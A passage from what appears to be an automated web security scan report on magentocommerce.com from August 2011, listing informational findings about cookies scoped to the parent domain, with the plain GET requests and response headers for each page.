User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.106. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.107. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.108. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.109. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.110. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Fsolution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:14 GMT
Content-Length: 39161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.111. http://www.magentocommerce.com/partners/view/117/gorilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/view/117/gorilla

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/view/117/gorilla HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176374; expires=Sat, 11-Aug-2012 15:12:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fpartners%2Fview%2F117%2Fgorilla%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:54 GMT
Content-Length: 57995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.112. http://www.magentocommerce.com/pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pl HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176513; expires=Sat, 11-Aug-2012 15:15:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fpl%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:13 GMT
Content-Length: 70432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.113. http://www.magentocommerce.com/product/community-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/community-edition

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/community-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Fcommunity-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 32482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.114. http://www.magentocommerce.com/product/compare  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/compare

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/compare HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175710; expires=Sat, 11-Aug-2012 15:01:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fproduct%2Fcompare%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:50 GMT
Content-Length: 47177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.115. http://www.magentocommerce.com/product/deployed-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/deployed-solutions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/deployed-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175705; expires=Sat, 11-Aug-2012 15:01:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:45 GMT
Content-Length: 32561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.116. http://www.magentocommerce.com/product/emerging-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/emerging-business

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/emerging-business HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_activity=1313170894; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.2.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171056; expires=Sat, 11-Aug-2012 13:44:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:16 GMT
Content-Length: 33707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.117. http://www.magentocommerce.com/product/enterprise-community-faqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-community-faqs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-community-faqs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175681; expires=Sat, 11-Aug-2012 15:01:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fproduct%2Fenterprise-community-faqs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:21 GMT
Content-Length: 42996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.118. http://www.magentocommerce.com/product/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-edition

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:00:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175633; expires=Sat, 11-Aug-2012 15:00:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproduct%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:00:33 GMT
Content-Length: 37947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.119. http://www.magentocommerce.com/product/enterprise-level  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/enterprise-level

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/enterprise-level HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; exp_domain=magentocommerce.com; exp_last_visit=997810832; exp_last_activity=1313170832; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.1.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894; homepage_intro=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 32647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.120. http://www.magentocommerce.com/product/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/faq

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/faq HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
